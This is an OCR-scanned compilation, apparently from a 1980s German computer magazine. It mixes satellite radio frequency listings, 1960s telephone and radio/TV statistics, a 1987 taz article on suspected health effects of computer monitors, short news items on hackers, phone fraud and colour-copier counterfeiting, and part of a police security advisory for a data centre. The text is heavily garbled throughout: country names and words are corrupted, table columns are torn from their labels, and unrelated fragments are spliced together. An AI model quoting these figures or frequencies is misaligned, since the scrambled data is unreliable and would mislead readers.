SA T-ßADIOPROGRAMME
SA T-PADIOPROGRAMME
Radioprogramme im Satband 10
DIE SATELLITEN UND IHRE PROGRAMME
im Satband 10,95 -11,7 GHz und 12,5 -12,
GHz und 12,5 -12,75 GHz (Telecom)
(alle aufgeführten Härfunkprogramme senden 24 Stunden täglich)
BBC-WORLD SERVICE
BBC-WORLD SERVICE
BBC-WORLD SERVICE
BBC-WORLD SERVICE
CABLE ONE
DEUTSCH LANDFUNK
RADIO LUXEMBURG
RADIO TEEN
STAR SAT RADIO MÜNCHEN
VOICE OF AMERICA
I AQUARELLE
RTL
EUROPE 1
EUROPE 2
AFP
RADIO NOSTALGIE
PACIFIC FM
SKY ROCK
FUN FM
RFM
NRJ-RADIO ENERGIE
RMC
KISS FM
ENGLISCH
VERSCHIEDEN*
ENGLISCH
VERSCHIEDEN*
ENGL./HOLLÄND.
DEUTSCH
DEUTSCH
ENGL./HOLLÄND.
DEUTSCH
ENGLISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
FRANZÖSISCH
EUTELSAT 1-F1. 13° OST
EUTELSAT 1-FL 13° OST
INTELSAT VA-Fll. 27.5° WEST
INTELSAT VA-Fll, 27.5° WEST
SUPER CHANNEL
SUPER CH/J^NEL
BBC1-2 F. DÄNEMARK
BBC1-2 F. dXnEMARK
EUTELSAT 1-F1. 13° OST
3SAT **
INTELSAT VA-F12. 60° OST
WDF3
EUTELSAT 1-F1. 13° OST
RTL PLUS
EUTELSAT l-FI, 13° OST
FILMNET
EUTELSAT l-FI, 13° OST
SAT 1
EUTELSAT 1-F1. 13° OST
SAT 1
TELECOM 1A. 8° WEST
M6
TELECOM 1A. 8° WEST
M6
TELECOM 1A, 8° WEST
M6
TELECOM 1A. 8° WEST
LACINQ
TELECOM 1A. 8° WEST
LA CINQ
TELECOM 1A. 8° WEST
LACINQ
TELECOM 1A. 8° WEST
/
TELECOM 1A, 8° WEST
/
TELECOM 1A. 8° WEST
/
TELECOM 1A, 8° WEST
/
TELECOM 1A, 8» WEST
l
TELECOM 1A, 8° WEST
l
TELECOM 1A, 8° WEST
l
* einige Stunden täglich auch in deutscher Sprache
Es werden auch noch 2 norwegische Programme über Etrteisai l-FS.
VERTIKAL
11.674
7.380 MONO
VERTIKAL
11,674
7,560 MONO
HORIZONTAL
11,175
7.020 MONO
HORIZONTAL
11,175
7.200 MONO
HORIZONTAL
11,174
7,560 & 7,740 STEREO
HORIZONTAL
11,010
7,020 & 7.200 STEREO
VERTIKAL
11.091
7.020 & 7,200 STEREO
VERTIKAL
11,140
7,920 STEREO
VERTIKAL
11,507
7,380 & 7.560 STEREC
VERTIKAL
11,507
7.020 & 7.200 STEREO
VERTIKAL
12.522
6.200 & 7.400 STEREO
VERTIKAL
12.522
6,500 & 7.750 STEREO
VERTIKAL
12,522
6.850 & 8.200 STEREO
VERTIKAL
12,606
6.200 & 7.400 STEREO
VERTIKAL
12,606
7.750 MONO
VERTIKAL
12,606
6.850 & 8.200 STEREO
VERTIKAL
12,648
2.700 & 6.150 STEREO
VERTIKAL
12.648
3.600 & 4.200 STEREO
VERTIKAL
12.648
4.950 & 5.800 STEREO
VERTIKAL
12.648
2.350 & 5.350 STEREO
VERTIKAL
12.648
5.850 & 8.200 STEREO
VERTIKAL
12.648
6.200 & 7.400 STEREO
VERTIKAL
12.648
6.850 & 7.750 STEREO
7® Ost aogestrahrt. jedoch in M-AC-OIGITAL.
Countries Havlng More than 100,000 Tetephonet
Telephonei in Service, 1965
(Ooto portiolly earimoted)
Per- Tel«-
cent- phones
□ge per
Counfry
Number
of
lolephonei
crease
ovor
1955
100
pop.
oIq-
lion
Algerio
139,473
35.4
1.13
Argentina
1,472,132
36.3
6.64
AmlroUo
2,670,212
80.9
23.98
Auslria
936,207
95,3
12.99
Belglum
1,468,144
76,8
15.57
Brazil
1,263,072
71.4
1.60
Bulgoria
248,900
3.04
Conado
7,021,000
8*1
36.12
Chile
249,582
67.1
2.89
China, Communijl*
244,028
0.05
Colombia
409,589
isoio
3,63
Cuba
228,687
60.6
3.08
Czechoilovakia
1,398,509
97.8
9.91
Danmoffc
1,310,746
51.5
27.46
Finlond
778,101
79.7
16.92
Formoja
147,825
250.2
1.21
FroncB
5,703,878
93.6
11.71
Gonmany, Eait
1,586,838
60.0
9.33
Germony, Weit
8,168,168
121.6
13.93
Greece
431,292
254.6
5.06
Hong Kong-
219.693
279.0
5.87
Hungory
538,608
65.1
5.31
Indio
760,000
209.2
0.16
Indoneila
204,335
180.4
0.19
Iran
181,130
207.0
0,78
Ircland
203,900
83.5
7.14
Israel
215.020
226.0
8.51
•1948.
Sourcoj American Telephone and Telagroph
Counfry
Numbor
of
telophonas
P&r- Tele-
cenN phonos
og« per
jn. 100
creose pop-
ovsr ula-
1955 lion
Itoly
5,528,751
171.4
10.54
Japan
12.250,841
331.6
12.54
Karea, South
232.901
446.1
0.83
Malaysia
121,066
1.31
Mexico
725.072
ib?!?
1.80
Morocco
146,684
35.0
1.12
Nelherlands
2,180,273
113.5
17.85
New Zcolond
962,596
94.0
36.52
Norway
868.592
51.7
23.42
Pokiiton
120,525
172.8
0.12
Peru
132,367
107.7
1.15
Phiilppines
151,593
182.0
0.4B
Polond
- 1,193.362
184.1
3.81
Porfußol
521,921
125.6
5.72
Puerto Rico
186,948
211.8
7.20
Rumonia
426,502
2.25
South Africo
1.133,331
72!5
6.40
Spoin
2.526.843
1547
8.03
Sweden
3,386,925
61.5
44.01
Switzerland
2,131,521
86.7
35.97
Turkey
306.100
111.9
0.99
U.S.S.R,
7,200,000
140.8
3.14
United Arob Republic 301,405
1.03
United Kingdom
9.960,000
53*6
18.27
United Stales
88,785.000
60.1
45.88
Uruguay
189,500
65.8
7.02
Venezuela
260,228
149.0
3.04
Yugoslavia
369,844
130.3
1.91
I., 7h« WorJd'i Telephonat, I9SS ond 1965.
Welt am Draht; Im Juli 1986
waren 41,2 Mio. amerikani¬
sche Haushalte (47,8 %) an
ein Kabeinetz angeschlos¬
sen. Ein Jahr zuvor waren es
noch 5 % weniger.
When you use the phone don't ever
woste a wrong number. For instance, if
. someone calls up and says, '*is Jack
there?" don't say, ’i'm sorry, you have
the wrong number." Say, "Hang on, l'll
see. Who's calling?" Then wait a second.
sorry, Jack doesn't want to talk to
you. Jack is still very angry with you,
and he doesn't want to discuss it.'V
Encyclopädia Britannica
Toble )|.
Rodio ond Telovislon
Receivers per 1,000
Population, 1966
Selected Couniries
Covmtry
Afghonisidr
Algerla
ArgenUna
Abslrolio
'Auslrla
Belglum
Bolivia
Brazil
Bulgorla
Burma
Combodlo
Conodo
Ceylon
Chile
China
Colombia
Congo
Cuba
Cyprui
Czechosiovaklo
Denmark
Eciindot
I iliiu|iiii
linlactd
Formoso
Frone«
Germany, East
Germany, Weil
Ghana
Greece
Hungory
Indio
Indonesto
Iran
Iroq
lirosi
Ilaly
Japon
Kenya
Korea, North
Korea, South
Kuwait
Lebanon
Maloysia
Mexico
Morocco
Netherlands
New Zealand
Nigerio
Nerwoy
Pokiiton
Panoma
Peru
Philippinei
Polond
Perlugol
Rhodesio
Rumonia
South Africo
Spoln
Süden
Sweden
Switzerlond
Syria’
Tonzonia
Thoilond
Tuniiio
Turkey
U.S.S.R.
U.A.R.
U.K.
u.s.
Uruguoy
Venezuelo
Vietnam, Soulh
Zombia
Rodio* "ry
20
__ ■
173
13.7
317
66.1
662;
2U.1
317
100,4
421-
153.8
200
118-
29.5
170
22.8
13
63
602
25V.b
37
291
V.8
7
.13
221
22.1
13
0.03
166
63.B
226
24.1
232
157.8
357
226.8
177
6 S
Ü.IV
7.1
389
15B.1
111
5.0
387
132.6
352
188.7
337
122.4
65
0.10
165
.41
246
81.8
10
__
27
0.45
91
4.5
121
20.6
235
5.7
212
1204)
334
202.6
53
1.1
13
52
‘iVs
265
79.9
143
59.6
73
12:2
107
28.8
53
23.3
291
180.9
523
154.2
17
0.52
482
131.1
11
0.02
373
58.3
W2
18.3
60
S.4
14S
65.7
161
19.6
35
9.0
99
23.4
174
251
54.9
22
0.7
398
267.7
459
105.8
195
12.9
14
82
8.2
86
1.2
83
0.04
160
60.4
166
U.o
459
275.6
1,174
357.4
240
67.3
288
60.9
31
26
2.7
*Doet not includo wirod
speokers.
Eovre, U.S. lnforn,<„io„
Agency, Reiearch Ond Rof,
erence Service.
Telecommunications
Major developments in Communications in I960 in-
jkjded: (1) the Start of worldwide commercial com-
TV panel discussing nuclear weapon control on CBS via Early Bird
Communications salellite on March 1,1966. Lefl, rrioderator
Eric Sevareid in New York City; top lefl. British Minister of State
Lord Chalfont in Geneva; top right, French Air Force Gen.
P. Gallois (retired) in Paris; botlom left, formen West German
Defense Minister F. Strauss in Munich; and bottom right, U.S.
Sen. R. Kennedy in Washington, D.C.
Bunicalions Services offered by the U.S.-controlled,
iXcrnationally owned Communications Satellite
Corp.; (2) progress in solving some of the serious
Ciotlicts involved in imposing the revolutionary tech-
lelogy of satellite Communications on the existing
Uethods of Communications; (3) the first attempts to
Inmslate the economies of satellite Communications
|Bo lower international rates; (4) the Start of a na-
flottal debate in the U.S. over financing educational
television, possibly through economies expected from
the use of Communications satellites; (S) heavy de-
mands on Communications technology for meeting
the requirements of the U.S. involvement in the war in
South Vietnam; and (6) progress on new Systems to
improve aircraft and ship Communications and navi-
Table Tennis;
>ee Sporting Record
Taiwan;
le« Formosa
Tariffs;
see Commercial
Policies; Trade
International
Taxation:
iee Government
Finance
Tea;
jee Agriculture
strahlende Computer
Von Carola Schewe
Ursulalrlearbeiteteaushilfsweise
drei Stunden täglich an einem
Computerbildschirm. Nach vier
Wochen litt sie plötzlich unter
Schlaflosigkeit, Herzrhythmus-
störungenundseltsamenHautaus-
schlägen nach dem Duschen. Sie
gab den Zusatzverdienst wieder
auf — und die Beschwerden ver¬
schwanden. Jetzt fürchtet sie, ih¬
ren angestammten Arbeitsplatz
auch aufgeben zu müssen: auch
dort werden demnächst Bild¬
schirme installiert. Nach einer
Odyssee vom Haus- zum Zahn¬
arzt, über den Internisten zum
Nervenarzt ist ihr klar: ihr fehlt
sonst nichts. Aber Bildschirmar¬
beit verträgt sie nicht. Eine Be¬
rufsunfähigkeitsrente oder eine
Entschädigung wegen einer Be¬
rufskrankheit darf sie aber nicht
erwarten. Laut amtlicher Sprach¬
regelung können Bildschirmar¬
beitsplätze gar nicht krank ma¬
chen.
Und wenn sie cs doch tun? Die
Betroffenen machen EKGs und
Allergietests, lassen sich Valium
und Psychotherapie aufschwat¬
zen. „Alle Kolleginnen sehen ihre
gesundheitlichen Störungen als
persönliches Schicksal an und ha¬
ben sich damit abgefunden“, be¬
richtet eine Datentypistin. Behan¬
delnde Ärzteuntersuchen Körper¬
details — die Augen, den Unter¬
leib, die Nieren — und verneinen
dann jeden Zusammenhang mit
den .Arbeitsbedingungen.
UrsulalrlehatsicheinerSelbst-
hilfegruppe angeschlossen, die
vor einigen Monaten von der Ma¬
schinenbautechnikerin Ingeborg
May-Steinhausen gegründet
wurde. Sie hatte teilweise ganz¬
tags am CAD-Bildschirm ge¬
zeichnet und Nieren- und Blasen¬
beschwerden davongetragen. Im
Gegensatz zu vielen anderen
suchte sie die „Schuld“ für ihre
Krankheit nicht bei sich, sondern
in ihren Arbeitsbedingungen.
Und sie fand sich auch nicht ab. Sie
kündigte. „Seit 26 Jahren bin ich
im Arbeitsprozeß, ohneeinenTag
arbeitslos gewesen zu sein. Da ich
noch ca. 20 Jahre im Berufsleben
zu stehen habe, möchte ich alles
tun, um meinen Gesundheitszu¬
stand wieder herzustellen, ehe es
zu spät ist“, schrieb sie in dem
Brief ans Arbeitsamt. Ihre Gut¬
achten waren so überzeugend, daß
das Arbeitsamt den Kündigungs¬
grundanerkannte. EinPräzedenz-
fall. Bisher wurden ähnliche Be¬
gehren immer mit dem Hinweis
auf den wissenschaftlichen Er¬
kenntnisstand vom Tisch ge¬
wischt.
Noch Anfang Juni antwortete
die Bundesregierung auf eine An¬
frage des SPD-Abgeordneten Ur-
baniak: „Nach Kenntnis der Bun¬
desregierung hat bisher weltweit
keine der abgeschlossenen wis¬
senschaftlichen Untersuchungen
gesundheitsschädigende Auswir¬
kungen der Bildschirmarbeit
nachgewiesen“. Das ist nicht
falsch. Nachgewiesen, abgesi¬
chert durch eine genügend große
Anzahl menschlicher Probanden,
ist noch gar nichts. Wer hat schon
Interesse, einer Zukunftstechno¬
logie nachzuweisen, daß sie die
Gesundheit beeinträchtigt? Die
Bundesregierungjedenfallsnicht.
Sie behauptete zwar im letzten
Jahr, auch das Arbeitsumfeld in
Forschungsvorhaben zu neuen
Technikeneinbeziehen zu wollen,
lehnte aber jetzt eine spezielle
Großfelduntersuchung ab. Das
Institut für Strahlenhygiene des
Bundesgesundheitsamtes bestritt
in diesem Jahr einen Zusammen¬
hang zwischen Bildschirmarbeit
und Schwangerschaftskomplika¬
tionen. Und ganz aktuell äußerte
sich eine Ad-hoc-Arbeitsgruppe
der Deutschen Gesellschaft fiir
Arbeitsmedizin e.V. (einem sehr
konservativen Berufsverband);
Bildschirmarbeit könnezwarHal-
tungsprobleme und Sehstörungen
mit sich bringen. Aber alle ande¬
ren Befürchtungen entbehrten je-
derGrundlage. Diese Grundlagen
zu schaffen, istdasHauptanliegen
des Informationsbüros May-
Steinhausen.
Die Anfrage des Abgeordneten
und der harsche Ton der Arbeits¬
medizinerhabendengleichen An¬
laß; Es gibt ein neues Gutachten,
das die festgefahrene Diskussion
wieder in Schwungbringt. Dr. Ute
Boikat, Richard Donderer und
Roland Kollert stellten im Auftrag
einer Computerzeitschrift den in¬
ternationalen Erkenntnisstand
zum Thema „Biologische Effekte
elektromagnetischer Strahlung
von Computer-Bildschirmen“ zu¬
sammen und maßen erstmals die
konkreten Werte von 16 Home-
und Personal-Computern.
Daß es einem nach Bildschirm¬
arbeiten vor den Augen flimmert,
daßman nachts weniger sieht, daß
Daten-Tippsen unter verspann¬
tem Nacken leiden — das bestrei¬
tet heute kaum noch j emand. Aber
schon bei der Frage der Röntgen¬
strahlung, die aus den Geräten
austritt, scheiden sich dieGeister.
Es gibt schwedische und kanadi¬
sche Untersuchungen, die eine
Gefährdung von Föten und
Schwangeren für wahrscheinlich
halten. Eine finnische Studie fand
dafür keine Beweise.
Aber die Langzeilwirkungen
geringer Röntgenstrahlung sind
nicht ausreichend erforscht. Seit
die Diskussion darüber gegen
Ende der siebziger Jahre breites
öffentliches Interesse fand, haben
sich die Computerhersteller mit
Erfolg bemüht, die Röntgenstrah¬
lung ihrer Geräte zu minimieren.
Die neuesten Forschungen im
Ausland und auch das Gutachten
von Boikat und Co. beschäftigen
sich mit einer anderen Art von
Strahlung: der elektromagneti¬
schen, diealleelektrischen Geräte
erzeugen. Die Wechselströme ,
die sie in menschlichen Körpern
hervorrufen, sind sehr schwach —
niederfrequent und damit lang¬
weilig. Akut passiert deshalb
nichts Besonderes. Neben einem
elektrischen Föhn zu stehen, läßt
einenja auch nicht plötzlich krank
werden. Aber der sogenannte
Elektro-Smog ist bereits ein viel¬
diskutiertes Problem: Menschen
schlafenschlechtunter Hochspan¬
nungsleitungen; Herzschrittma¬
cher versagen in der Nähe von
Starkstromkabeln; Säuglinge
werden unruhig neben Elektro¬
herden.
Bei Bildschirmen werden diese
elektromagnetischen Felder ge¬
pulst, d.h.biszusechzlgMalinder
Sekunde an- und ausgeschaltet.
Das verstärkt deren Wirkung
enorm. Wenn die Frequenz dieser
elektromagnetischen Strahlung
diejenige beeinflußt, mit der die
^ 33
3r Cb
33
33-
CT ^
Cb' Cb'
^ §
r-i-‘
ty'. o?'
=3 ^
Cb
Cd
33'
33
Cb
C;
Cb
Liebesgrüße per Diskette, strahlende Gesichter
ein Bildschirmarbeitsplatz in der Computerwerbung
Foto: taz-Archiv
Zellmembranen im Körper mit¬
einander „flüstern“, können die
Zellen in ihrer Funktion gestört
werden. Äußerlich meßbar ist
dann der Verlust von Calcium aus
den Zellen. Kalk ist für die Reiz¬
übertragung äußerst wichtig.
Wie die Störungen ablaufen,
und ob elektromagnetische Strah¬
lung etwa auch Krebs hervorru fen
kann, erforscht zur Zeit das US-
amerikanische „National Council
of Radiation Protection“. Und
auch aus anderen Ländern, vor al -
lern ausdem Ostblock, liegen Stu¬
dien mit Anhaltspunkten dafür
vor, daß die Wirkung elektroma¬
gnetischer Strahlung schon bei
Null beginnt. Anhaltspunkte da¬
für, daß Bildschirmarbeit auf je¬
den Fall gefährlich ist.
Dies ist der Punkt, der die Ar¬
beitsmediziner, die sich der Indu¬
strie verpflichtet sehen, sogarstig
werden läßt. Jeder Bildschirm
sendet elektromagnetische Strah¬
lung aus. Die meisten sorgen mit
ihren clektromagneti sehen Entla¬
dungen außerdem für ein regel¬
rechtes Staubpartikel-Bombarde¬
ment auf die Haut der Benutzerin¬
nen — ein weiteres Phänomen,
dessen gesundheitliche Folgen
noch nicht erforscht sind.
Bei ihrem Warentest fanden
Boikat/Donderer/Kollert keinen
Computer, den sie bedenkenlos
empfehlenkönnten. GuteWertein
einem Meßbereich wurden meist
durch miserable in einem anderen
zunichte gemacht. Strahlungs¬
arme Bildschirme mit Flüssigkri¬
stall- oder Plasma-Technik wer¬
den frühestens in sechs Jahren
marktreif. Ein provisorischer Fil¬
ter, Erdung und Ummantelung
können allerdings die Strahlung
um bis zu neunzig Prozent verrin¬
gern.
Dr. Ute Boikat weiß, mit wel¬
chen Gegnern sie es zu tun hat.
„Die greifen mich leidenschaft¬
lich an“, meint sie ein wenig
furchtsam. Und sie findet auch,
daß ihre Ergebnisse nur ein An¬
fangseinkönnen, um weiterzufor¬
schen.
Bleiben noch die Gewerkschaf¬
ten. Sindsie zu arm, umeigeneex-
perimentelle Studien in Auftragzu
geben? Oder liegt ihr mangelndes
Engagement darin begründet, daß
vor Bildschirmen meist Frauen
sitzen? Während Frauen oft acht
Stunden täglich auf den Monitor
starren müssen, haben Männer
meist Mischarbeitsplätze. Sabine
Kaiser, zuständig beim DGB-
Bundesvorstand, findet, daß die
Gewerkschaften sehr wohl aktiv
sind in diesem Punkt — aber man
verfüge halt über so wenig abgesi¬
cherte Erkenntnisse...
Ihr nächster wichtiger Termin
ineinerPolitikderkleinenSchritte
ist die Herbstsitzung eines berufs¬
genossenschaftlichen Fachaus¬
schusses,deru.a. Regelwerkezur
Vorbeugung gegen Unfälle und
Berufskrankheiten erarbeitet. Für
Bildschirmarbeitsplätze gibt es
bisher nur sogenannte „Sicher¬
heitsregeln“, die keine Gesetzes¬
kraft haben. Ansonsten gelten die
Vorschriften für den Strahlen¬
schutz. Der DGB möchte eine
rechtsverbindliche „Unfallver¬
hütungsvorschrift“ erstellt wis¬
Mit freundlicher Genehmigung der "taz" entnommen
sen, mit folgenden Inhalten:
► Als Bildschirmarbeitsplätze im
Sinne der Vorschrift sollen die
gelten, an denen jemand am Ter¬
minal sitzt — und sei es auch nur
eine halbe Stunde am Tag. Bisher
galt die Definition nur für „über¬
wiegende“ Tätigkeit am Compu¬
ter —ein beliebtes Schlupfloch für
die Arbeitgeber.
► Herabsetzung der Grenzwerte
und Zuschnitt auf die Situation an
den Monitoren. Ziel; auch Lang¬
zeitschäden sollen vermieden
werden.
► Die Hersteller sollen dazu ge¬
zwungen werden, jede Art von
Strahlenbelastungzuminimieren,
also Ummantelungen und Filter
schon im Werk einbauen.
^ Schwangere sollen aufWunsch
einen anderen Arbeitsplatz be¬
kommen.
zer/innenfreundlich gestaltet
sein.
Die Berufsgenossenschaften
sind partitätisch mit Arbeitgebern
und Gewerkschaften besetzt. Sa¬
bine Kaiser wirdalso Mühe haben
ihre Forderungen durchzusetzen.’
Betroffene, die sich im Betrieb
engagieren, haben dennoch ganz
gute Chancen, sich selbst zu hel¬
fen, Ein Mitglied der Selbsthilfe¬
gruppe erkämpfte sich einen bild-
schimnfreien Arbeitsplatz mit Un¬
terstützung des Werksarztes. „Er
batmich, keinem zu erzählen, daß
diese Störungen von der Arbeit am
Bildschirm kommen“, gab er zu
Protokoll. Und Ingeborg May-
Steinhausen weiß, daß zehn wei¬
tere Kolleginnen nach ihr kündig¬
ten. Dem Chef war das eine War¬
nung; er versprach Verbesserun¬
gen.
Software soll möglichst benut-
1) Das Boikai-Guiachicn ist in
popuIärwisscnschafUicher
Form nachzuiesen in der Juni*
Ausgabe des P.M.-Compulcr-
hefts. Bestellung pcrEinzahlung
von DM 7,50 auf Konto Nr.
7115-203 Po.MgiTD Hamburg.
2) Informationsstelle inge¬
borg May-Steinhausen. Brük-
kenstr. 50. 6000 Frankfurt 70.
Tel.: 069/61 47 07. Ein Frage¬
bogen wird gerne an Betroffene
verschickt.
3) Die Stellungnahme der
Deutschen Gesellschaft für Ar-
beitsmeduin e.V. erscheint in
derNr. 7der Zeitschrift für Ar-
beitsnftedizin. Sozialmedizin,
Praventivmedizin, Der Be-
irid)sarzt. Center Verlag, Stutt¬
gart.
4) Di« Firma .Logo Compu¬
ter" stellt slle Alten von Bild-
schirmfillcrn her (vom hilltgn
Nylon-Filter gegen Flimmern
bis zu Metallfiltcrn für militäri¬
sche Zwecke). Sic . ein'
deutsche Hersteller für Carbon-
filicr gegen elektromagnetische
Strahlung. Tel.:
089/59 61 34/5. Bayerstr. 2.
8(XX) München 2
5) AuchAlu-odcrKupferfoIie
hilft Strahlung verringern. Es
bcstehiaberdicGcfahrdcrÜbcr-
hitzung des Computers bei un¬
sachgemäßer Montage.
6) Computer der Firma Mc-
nicirex sind angeblich mit Filter
und Erdungssicllc ab Werk lie¬
ferbar. DieskandinavischcFima
Nokia stellt strcustrahlungs-
annc Bildschirme her.
7) Die »Sichcrhciisregeln für
Bildschirmarbeitsplätze“ müß-
• ivuo.ai iiiiucii. uegen ein<
ringe Gebühr verschickt si
Verwaitungs-Bc rufsgenoss
Schaft, Postfach so 21
2(X)0 Hamburg 60 ,
Obiger Artikel erschien
am 30. Juli 1987 ir,
"tageseeuung". Die Auio-
rin hol imwischen ein
Buch über das Thema ge¬
schrieben. Es erschein,
wahrscheinlich im Januar
1989 unter dem Titel
"Krank durch Computer,-
Die neue Volkskrankheit
and was Sie dagegen tun
können" im Rowohlt Ver¬
lag.
Computerkids
„ganz normal“
Computerkids sind .ganz normale Ju¬
gendliche und keine vereinsamten
Sonderlinge*. Das Ist das Ergebnis ei¬
ner Umfrage der Computerzeltschrif¬
ten CHIP und HC. Von 3000 Befragten
konnte fast jeder zweite (46 Prozent)
durch sein Computer-Hobby sogar
neue Freunde dazugewinnen, Gerade
sechs Prozent haben Freundschaften
zugunsten neuer aufgegeben, nur bei
drei Prozent wurde der Freundeskreis
kleiner.
Auch die Beziehungen zum anderen
Geschlecht leiden kaum unter der
Bildschirm-Begeisterung. Von gemein¬
samer Interessenlage kann allerdings
weniger die Rede sein; Neun Prozent
der jeweiligen Partner/innen lehnten
den Computer, entschieden ab, fast die
Hälfte der Freunde/Freundinnen von
Computerfreaks stehen dem Hobby
des Partners/der Partnerin eher
gleichgültig gegenüber. Gerade acht
Prozent sind ebenfalls vom Partner-
Hobby begeistert. Das restliche Viertel
ist .eher positiv* eingestellt.
Oie Beschäftigung mit dem Computer
wird von den Jugendlichen nicht nur
als Freizeitsport betrieben. Die gro8e
Mehrheit der Befragten (82 Prozent)
entarten sich auch schulische Vorteile
davon. Jeder Vierte (28 Prozent) rech¬
net mit besseren Berufschancen.
Von den CHIP/HC-Fragebögen wur¬
den gerade vier Prozent von Mädchen
oder jungen Frauen zurückgeschickt.
QueUe: ddp AprU/es
US-Kids:
eher lustlos
Kinder zwischen acht und dreizehn
Jahren haben, zumindest in den USA,
kein besonders enges Verhältnis zum
Computer. Sie meiden den Bildschirm
in Ihrer Freizeit und halten Abstand zu
den. computerbesessenen Altersge¬
nossen. Zu diesen Ergebnissen
kommt eine Studie der University of
California. Resümee; .Dia' vermutete
Entwicklung zu Computerklndom hat
nicht Btattgefunden.*
Gerade die Hälfte der befragten Drei¬
zehnjährigen etwa weis, wie ein Com¬
puter funktioniert. Und dies, obwohl
ihre Schule entsprechende Kurse an¬
bietet Nicht einmal jeder dritte von ih¬
nen will als Erwachsener etwas mit
Computern zu tun haben.
QueUe: SPIEGEL 44/85
Hacker freigesprochen
London, (dpa) Das britische Oberhaus
als oberste Berufungsinstanz hat zwei so¬
genannte Hacker, die sich Zugang zu dem
Computer-Informationssystem „Prestel“
verschafft hatten, freigesprochen. Nach
Ansicht der Lords stellte das Anzapfen
der Datenbank keinen kriminellen Akt
dar. Den beiden Angeklagten sei es nicht
um Geldgewiim, sondern um die Demon¬
stration ihrer Fähigkeiten, als Hacker ge¬
gangen, meinten die Lord-Richter.
2.1.M.
Ein (Alp-)Traum wild wahr:
Geid aus dem Kopierer
Super-Kopierer produziert täuschend echt Blüten / Polizei ist hilflos
Frankfurt - „Der Wunschtraum der farbigen Kopie
geht in Erfüllung.“ So wirbt der japanische Konzern
Canon für einen neuen Farbkopierer, der nicht nur den
Kopierermarkt, sondern auch die Unterwelt revolutio¬
nieren könnte. Denn „Color Laser“ kopiert einfach alles
täuschend echt. Besonders gut Geldscheine, Aus¬
weise und Geschäftsbriefe. Die Polizei ist hilflos.
In Spanien und den USA
sind bereits kopierte „Blü¬
ten" und Schecks aufge¬
taucht. Hierzulande schlagen
die Fahnder Alarm, ehe der
Kopierer ab Herbst verkauft
wird Ein Polizist; „Da
kommt sogar das Wasserzei¬
chen durch."
Die Bundesbank wiegelt
ab: „Wir sind sicher, daß kei¬
ne Blüten hergestellt werden
können, die nicht erkennbar
sind.“ Das stimmt. Für Ex¬
perten. Aber nicht für den
kleinen Mann auf der Straße,
meint ein Fahnder, der an¬
onym bleiben will: „Da
nimmt man normales 7(1-
Gramm-Papier. Das knistert
genauso schön. Dann kann
man den Schein in jeder
Farbschattierung ein¬
schweißen.“
Er zeigt auch einen nagel¬
neuen, angeblich fälschungs¬
sicheren Personalausweis -
gefälscht, „Man kann aucli
eine Kopie einschweißen“,
meint er resigniert.
Canon fühlt sich nicht für
etwaigen Mißbrauch mit dem
Super-Kopierer verantwort¬
lich. Ein Manager: „.leder
Kunde muß selbst für den le¬
galen Umgang sorgen," Den¬
noch wird über Sicherungen
nachgedacht. Etwa eine
Sperre, die nur mit einer
Kennkarle überwunden
wird. Nur: Auch diese Karten
kann „Color Laser" ko¬
pieren.
Telefone „senden*^ auch
BONN, 29. Dezember (dpa). Das Bun¬
despostministerium hAt eingeräumt, daß
mit Gebührenzählern ausgerüstete Tele¬
fone wie kleine Rundfunksender funktio¬
nieren und abgehört werden könnten.
Ein Sprecher versicherte am Montag,
dies sei aber nahezu belanglos, da die
„Sendeleistung“ nur 20 bis 30 Zentimeter
betrage. Eine Rückrufaktion der Appara¬
te, wie in der Presse gemeldet, sei nicht
beabsichtigt.
In einer Regionalsendung des WDR-
Fernsehens war vor kurzem berichtet
worden, Gespräche über rund 1,3 Millio¬
nen mit integrierten Gebührenzählern
ausgerüstete Telefone könnten „auch aus
einiger Entfernung“ auf Mittel- und
Langwelle auf unterschiedlichen Fre¬
quenzen empfan ” werden.
Hacker telefonierten
zum Null-Tarif
Beaver Dam. (rtr) Sechs jugendli¬
che "Hacker“ in Beaver Dam im US-
Bundesstaat Wisconsin haben über
ein Jahr lang ausgiebig telefoniert, oh¬
ne einen Pfennig Gebühren zu zahlen.
Wie die Polizei mitteilte, haben sich
die zwischen 13 und 17 Jahre alten
Teenager über ihren Computer Num¬
mern von Kreditkarten und Telefon¬
codes besorgt und dann rund 2000 Te¬
lefonate für umgerechnet knapp
80 000 Mark geführt. Höhepunkt der
heimlichen Hackeraktivitäten war
eine zwölf Stunden dauernde Konfe¬
renzschaltung mit Teilnehmern in
New York und Maryland, an der ins¬
gesamt 22 Personen beteiligt waren.
1
Sicherungsobjekt:
Rechenzentrum des Deutschen iOWlIlBforschungszentrums
sowie der geplante räumliche Aufbau für das Uniuersitäts-
und Klinikrechenzentrum
2 Besprechung und Ortsbesichtigung:
Am 27.02.1985 fand eine allgemeine Besprechung und Orts¬
besichtigung statt.
3 Vorbemerkungen:
Die nachfolgend empfohlenen Sicherungsmaßnahmen werden
als geeignet angesehen, die mecha.-.ischen Widerstands¬
und Widerstandszeitwerte an den als Schwachstellen er¬
kannten Bauteilen des zu sichernden Objektes zu erhöhen.
Es soll dadurch ein ei.nheitliches sicherungstechnisches
Niveau des gesamten Objektes erreicht werden.
Die Empfehlungen gehen von der Zielvorstellung aus
- unter Berücksichtigung der angetroffenen örtlichen
Voraussetzungen-, ein rechtswidriges Eindringen bzw.
Einbringen von Gegenständen in das Objekt wesentlich
zu erschweren und den Schaden bei einem Anschlag mit
Sprengstoff mit vertretbaren Mitteln so gering wie
möglich zu halten.
Ein Anspruch auf Vollständigkeit - unter dem Gesichts¬
punkt einer absoluten Schutzwirkung - kann nicht vor¬
ausgesetzt werden.
Die Sicherungsempfehlungen verfolgen das Ziel, die
Datenverarbeitungsanlage als gesicherte "Insel" inner¬
halb des Gebäudes auszubilden.
Baurechtliche und brandschutztechnische Vorschriften
können im Rahmen der weiteren Sachverständigen Sußerung
nicht berücksichtigt werden.
- 2 -
LANDES KRIMINALAMT BADEN-WÜRTTE M B L RO
Sachverständige Äusserung
Landeskrlmlnalamtes Baden-Württemberg
Fachgebiet: Krln.lnalpolizelllche PrÄventior.
- Fichbor«lch EIcherung b tochnIk
Slcherungsobjekt(e)
Rechenzentrum
Deutsches «■KMIforschungs-
zentrum und Universitäts¬
rechenzentrum
Aufgabenste11ung(en)
Beratung über die baulich-
technischen Sicherungsma߬
nahmen
